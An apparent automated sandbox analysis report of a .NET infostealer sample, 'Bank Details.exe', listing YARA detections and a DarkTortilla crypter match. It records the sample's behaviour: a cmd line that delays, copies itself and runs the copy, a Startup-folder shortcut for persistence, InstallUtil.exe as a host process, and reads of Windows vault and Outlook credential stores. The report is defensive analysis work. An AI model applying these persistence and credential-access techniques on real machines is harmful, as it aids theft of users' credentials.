                      Source: 16.2.udo.exe.43dcee2.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 17.2.InstallUtil.exe.730000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 16.2.udo.exe.45f6f20.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Bank Details.exe.47020c0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Bank Details.exe.44b8b92.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 16.2.udo.exe.45f6f20.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 16.2.udo.exe.43a1d22.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Bank Details.exe.4442802.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 16.2.udo.exe.43dcee2.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Bank Details.exe.468bd72.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Bank Details.exe.468bd72.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Bank Details.exe.447d9d2.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Bank Details.exe.47020c0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 16.2.udo.exe.4366b52.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 16.2.udo.exe.43a1d22.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 16.2.udo.exe.4366b52.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Bank Details.exe.447d9d2.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Bank Details.exe.45da998.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Bank Details.exe.4442802.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Bank Details.exe.447d9d2.2.raw.unpack, Tk7F6W0v.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Bank Details.exe.447d9d2.2.raw.unpack, Tk7F6W0v.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Bank Details.exe.447d9d2.2.raw.unpack, Tk7F6W0v.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Bank Details.exe.447d9d2.2.raw.unpack, Tk7F6W0v.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Bank Details.exe.447d9d2.2.raw.unpack, ivMw3WGb8.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Bank Details.exe.447d9d2.2.raw.unpack, ivMw3WGb8.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.Bank Details.exe.447d9d2.2.raw.unpack, cdw.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Bank Details.exe.447d9d2.2.raw.unpack, cdw.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Bank Details.exe, y8.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: Bank Details.exe, y8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: udo.exe.8.dr, y8.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: udo.exe.8.dr, y8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@18/10@1/2
                      Source: C:\Users\user\Desktop\Bank Details.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\udo.lnkJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2124:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
                      Source: Bank Details.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Bank Details.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Bank Details.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Bank Details.exeReversingLabs: Detection: 55%
                      Source: Bank Details.exeVirustotal: Detection: 43%
                      Source: C:\Users\user\Desktop\Bank Details.exeFile read: C:\Users\user\Desktop\Bank Details.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Bank Details.exe "C:\Users\user\Desktop\Bank Details.exe"
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 41 > nul && copy "C:\Users\user\Desktop\Bank Details.exe" "C:\Users\user\Desktop\udo.exe" && ping 127.0.0.1 -n 41 > nul && "C:\Users\user\Desktop\udo.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 41
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 41
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\udo.exe "C:\Users\user\Desktop\udo.exe"
                      Source: C:\Users\user\Desktop\udo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\udo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 41 > nul && copy "C:\Users\user\Desktop\Bank Details.exe" "C:\Users\user\Desktop\udo.exe" && ping 127.0.0.1 -n 41 > nul && "C:\Users\user\Desktop\udo.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 41Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 41Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\udo.exe "C:\Users\user\Desktop\udo.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
                      Source: udo.lnk.0.drLNK file: ..\..\..\..\..\..\..\Desktop\udo.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Bank Details.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Bank Details.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Bank Details.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: Bank Details.exeStatic file information: File size 1201152 > 1048576
                      Source: Bank Details.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x124c00
                      Source: Bank Details.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000012.00000002.3830643488.0000000005E80000.00000004.00000020.00020000.00000000.sdmp, boqXv.exe, 00000014.00000000.3311816237.0000000000422000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.18.dr
                      Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000012.00000002.3830643488.0000000005E80000.00000004.00000020.00020000.00000000.sdmp, boqXv.exe, 00000014.00000000.3311816237.0000000000422000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.18.dr

                      Data Obfuscation

                      barindex
                      Yara detected DarkTortilla Crypter
                      Source: Yara matchFile source: 0.2.Bank Details.exe.44b8b92.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.43dcee2.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.45da998.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.6550000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.44b8b92.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.6550000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.43a1d22.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.4442802.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.43dcee2.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.468bd72.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.468bd72.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.447d9d2.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.4366b52.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.43a1d22.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.4366b52.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.447d9d2.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.45da998.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.4442802.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1711519526.000000000368B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1711519526.0000000003434000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3840250798.00000000045BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1715433973.0000000006550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1713067974.0000000004407000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3840250798.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1711519526.0000000003341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3825194798.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1713067974.0000000004529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Bank Details.exe PID: 7720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: udo.exe PID: 3004, type: MEMORYSTR
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(_0024VB_0024Me.ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{if (Operators.CompareString(CS_0024_003C_003E8__locals0._0024VB_0024Local_result, "", false) == 0){CS_0024_003C_003E8__locals0._0024VB_0024Local_result = Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject((object)"TAPE", NewLateBinding.LateGet(CS_0024_003C_003E8__locals0._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Local_CurDrive, (Type)null, "DevIndex", new object[0], (string[])null, (Type[])null, (bool[])null)), (object)" loaded (unthread)"));}CS_0024_003C_003E8__locals0._0024VB_0024Local_result += "\r\n";object[] array3;bool[] array4;NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Me.TextBox2, (Type)null, "AppendText", array3 = new object[1] { CS_0024_003C_003E8__locals0._0024VB_0024Local_result }, (string[])null, (Type[])null, array4 = new bool[1] { true }, true);if (array4[0]){CS_0024_003C_003E8__locals0._0024VB_0024Local_result = (string)Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array3[0]), typeof(string));}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(_0024VB_0024Me.ComboBox3, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(_0024VB_0024Me.Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);_0024VB_0024Me.Nj(Conversions.ToBoolean(NewLateBinding.LateGet(_0024VB_0024Me.CheckBox3, (Type)null, "Checked", new object[0], (string[])null, (Type[])null, (bool[])null)));}) }, (string[])null, (Type[])null, (bool[])null, true)
